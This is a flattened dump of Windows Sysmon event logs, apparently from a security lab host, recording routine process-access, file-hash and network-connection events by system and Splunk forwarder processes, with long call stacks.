22:52:55.832{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 23542300x80000000000000001694361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.582{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8583D04636BFB72ECE891E2872D2267,SHA256=E195171C6E9A289BFE46D69BCC2C55C5BF30D39EA78CD960A3133B5749976171,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001694360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:55.395{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A5B988DCA45E22E2C1F11A3FEFEC3AD,SHA256=E176D83997B82BBB5974167548AA5AABC74E99DD64E4B826EF1FE7CB24C271C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001694359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:46.455{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55107-false10.0.1.12-8000- 354300x80000000000000001694358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:45.548{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51672- 23542300x80000000000000001694531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.947{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=212F24106D2E71B435038C82B7917973,SHA256=0F17D4005C8E0CF5D3D01E3BAA3C4D3C452390A35DE20A6A16AF34D7F43F34EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42802000C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x80000000000000001694519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8296C2EE59085A078DE86A889A88CB5,SHA256=C997AE9E69E9421C4AA6A17B7F578DE61B612A04D70116995E2B3894B07E9B0E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.770{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.741{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.740{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.740{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968500C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.676{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 